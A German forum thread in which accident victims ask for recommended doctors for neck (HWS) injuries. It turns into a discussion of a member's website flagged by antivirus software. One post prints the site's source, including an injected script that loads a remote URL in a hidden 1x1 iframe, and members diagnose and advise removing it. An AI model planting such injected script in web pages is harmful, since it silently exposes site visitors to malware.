• Herzlich Willkommen beim Forum für Unfallopfer, der größten Gemeinschaft für Unfallopfer im deutschsprachigen Raum.
    Du besuchst unser Forum gerade als Gast und kannst die Inhalte von Beiträgen vieler Foren nicht lesen und so leider nützliche Funktionen nicht nutzen.
    Klicke auf "Registrieren" und werde kostenlos Mitglied unserer Gemeinschaft, damit du in allen Foren lesen und eigene Beiträge schreiben kannst.

Welche Ärzte bei HWS-Schaden empfehlbar?

Rudinchen

Erfahrenes Mitglied
Registriert seit
6 Dez. 2009
Beiträge
2,386
Hallo,

es gibt ja wohl nicht so viele Ärzte, die sich mit HWS-Verletzungen gut auskennen.

Ich habe jetzt gehört, dass Dr. Jürgen Harms, SRH Klinikum Karlsbad-Langensteinbach gGmbH, einer der besten in Deutschland sein soll.

Kann mir das jemand bestätigen oder dementieren? Er praktiziert ziemlich weit weg von uns. Wenn er wirklich so gut wäre, würden wir ja den weiten Weg auf uns nehmen - aber wenn es dann ein Flopp wäre, wäre es schade um die Zeit und Kraft, die wir hineingesteckt haben ...

Viele Grüße, Rudinchen
 

Leon1468

Mitglied
Registriert seit
17 Mai 2011
Beiträge
43
Hallo rudinchen

Ich kann dir da leider keinen Rat geben. Ich kenne den Arzt nicht und suche eine kapazität in der Schweiz! ich weiss im Moment nicht ob ich zu einem Orthopäden oder einem Neurologen gehen soll

Liebe Grüsse und Alles Gute

Leon
 

oohpss

Erfahrenes Mitglied
Registriert seit
23 Juli 2007
Beiträge
1,237
Ort
Hamburg
Rekobär macht HWS Studie und kennt evtl. Ärzte

Hallo Rudinchen,

schau mal auf der Website http://www.unfallreko.de/ unter HWS.
Dort wird eine Studie beschrieben.
Und dort sind auch - ausschließlich - ineressierte Ärzte beteiligt.
Versuch mal hier den User Rekobär per PN anzuschreiben.
Nach meinen Informationen ist er der Gutachter, der auch mit dieser Studie zu tun hat und der kennt bestimmt den einen oder anderen fähigen Mediziner.

Grüße
oohpss
 

Der Charly

Erfahrenes Mitglied
Registriert seit
2 Juli 2007
Beiträge
539
Hallo oohpss


@ alle


ACHTUNG! ACHTUNG! ACHTUNG!


Der Link unfallreko.de enthält diese Viren!


Virus: JS:ScriptIP-inf [Trj] (Engine B


Grüssle
 

Der Charly

Erfahrenes Mitglied
Registriert seit
2 Juli 2007
Beiträge
539
Hallo Rudinchen

Ich war letzte Woche auf Empfehlung meines D-Arztes in der Klinik und kann dir nur sagen das ich in 17 Jahren keinen fähigeren Arzt bezüglich meiner Kopfgelenksprobleme kennengelernt habe.


Hier die Anschrift:


Dr. med. Jürgen Nothwang
Rems-Murr-Klinik Schorndorf Klinik f.Unfallchirurgie
Schlichtener Str. 105
73614 Schorndorf
Baden-Württemberg
Deutschland
Festnetztelefon: 07181/67-0
Fax: 07181/671580

Grüssle
 

Sekundant

Sponsor
Registriert seit
24 März 2009
Beiträge
4,872
Ort
hier, links von dir
Website
fallakte.12hp.de
Hallo Charly,

ich habe diese Meldung auch bekommen:

Der Link unfallreko.de enthält diese Viren!


Virus: JS:ScriptIP-inf [Trj] (Engine B
Hast Du avast als Virenprogramm? Ich will keine Entwarnung geben, aber avast reagiert auf bestimmte Dateien (zB video) mit dieser Meldung, es könnte aber eine Fehlermeldung sein. Sie ist auch schon bei anderen und auf anderen Seiten aufgetreten.

Wie gesagt, Vorsicht ist immer geboten, sicher kann man nie sein.


Gruss

Sekundant
 

Rekobär

Sponsor
Registriert seit
3 März 2011
Beiträge
3,223
Ort
Berlin
Website
www.unfallreko.de
Unfallreko.de

Hallo an @,

jetzt bin ich aber beunruhigt. Wie kann denn auf meine Webseite ein Virus kommen? Ich habe zwar Änderungen vorgenommen, aber das ist neu, dass da ein Virus darauf ist. Bin leider kein EDV-Spezialist. Vielleicht gibt es jemanden, der das erklären kann. Wäre sehr hilfreich.

Danke Der RekoBär:):):)
 

Der Charly

Erfahrenes Mitglied
Registriert seit
2 Juli 2007
Beiträge
539
@ alle

ich hab G Data und die Meldung ist eindeutig!

Hab ja extra den Trojaner angegeben!

Er versucht schon beim laden der Seite auf den PC zu zugreifen!

Grüssle
 

Der Charly

Erfahrenes Mitglied
Registriert seit
2 Juli 2007
Beiträge
539
@ alle
wenn ich den Link jetzt anklick kommt diese Meldung!

Website gesperrt!
G Data TotalCare 2010 hat den Zugriff auf diese Webseite verweigert.
Die Seite enthält infizierten Code: JS:ScriptIP-inf [Trj] (Engine B).


Grüssle
 

oohpss

Erfahrenes Mitglied
Registriert seit
23 Juli 2007
Beiträge
1,237
Ort
Hamburg
Hallo Rekobär,
das Problem ist nicht Deine Website, sondern eine Website, die Du im Hintergrund verlinkt hast bzw. auf die im Hintergrund verlinkt ist.
Und zwar befindet sich in dem Frame in dem das Bild ist, also ganz oben, folgender Code:
<html> <head> <title>Untitled Document</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#F4FCFF" text="#000000"> <div align="center"> <p>&nbsp;</p> <p><font face="Verdana, Arial, Helvetica, sans-serif" size="3"><b>Wie schnell muss man sein, um so etwas hinzubekommen ?</b></font> </p> <p>&nbsp;</p> </div> <table width="498" border="0" cellspacing="0" cellpadding="0" height="258" align="center"> <tr> <td background="JPG/bild4.jpg"> <div align="center"><font face="Verdana, Arial, Helvetica, sans-serif" size="3"></font></div> <div align="center"></div> </td> </tr> </table> </body> </html> <script type="text/javascript">document.writeln("<body>");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "http://farenta.in/gb/us.php";</script>
Nach meinem Eindruck ist die letzte Zeile der Übeltäter (ab <script ...).
Das Nachladen von http://farenta.in/gb/us.php für auf eine Malware Seite.
Ich habe es nicht weiter untersucht, aber Du solltest erstmal diese Zeile entfernen.

Auch am Anfang der Seite kommt eigenartiger Code, den ich so noch nicht gesehen habe. Es scheint sich um die Befüllung von Variabeln zu handeln und an sich ist so etwas bei Deiner recht einfachen Seite überflüssig.

In der Menüleiste scheint der Code recht sauber zu sein. Dort habe ich nichts auffälliges entdeckt.

Ich wollte mal schauen ob die Website von den Copyright-Inhabern auch den Link auf die Malware-Seite hat, aber die Website von [FONT=Verdana, Arial, Helvetica, sans-serif]PC & Datenbanken-Team ist nicht erreichbar.

Ich hoffe die Hinweise helfen weiter.

Viel Erfolg!

Grüße
oohpss
[/FONT]
 

oohpss

Erfahrenes Mitglied
Registriert seit
23 Juli 2007
Beiträge
1,237
Ort
Hamburg

Sekundant

Sponsor
Registriert seit
24 März 2009
Beiträge
4,872
Ort
hier, links von dir
Website
fallakte.12hp.de
Hallo,

die Hinweise von oohpss könnten richtig sein.

Nach meinem Eindruck ist die letzte Zeile der Übeltäter (ab <script ...).
Das Nachladen von http://farenta.in/gb/us.php für auf eine Malware Seite.
Ich habe es nicht weiter untersucht, aber Du solltest erstmal diese Zeile entfernen.
Dem stimme ich mal zu. Es könnte sich um cross-site-scripting handeln. Der Code generiert den Body-Tag, in dem in einem generierten 1x1 Pixel grossem iFrame die o.g. Seite eingebunden wird.

@Rekobär
Der von oohpss fett markierte Script-Bereich sollte unbedingt entfernt werden. Und bitte auch Deinen Provider informieren.

Hat der avira doch recht. Blöd, wenn sie andererseits immer mal eine Falschmeldung bringen.


Gruss

Sekundant
 
Top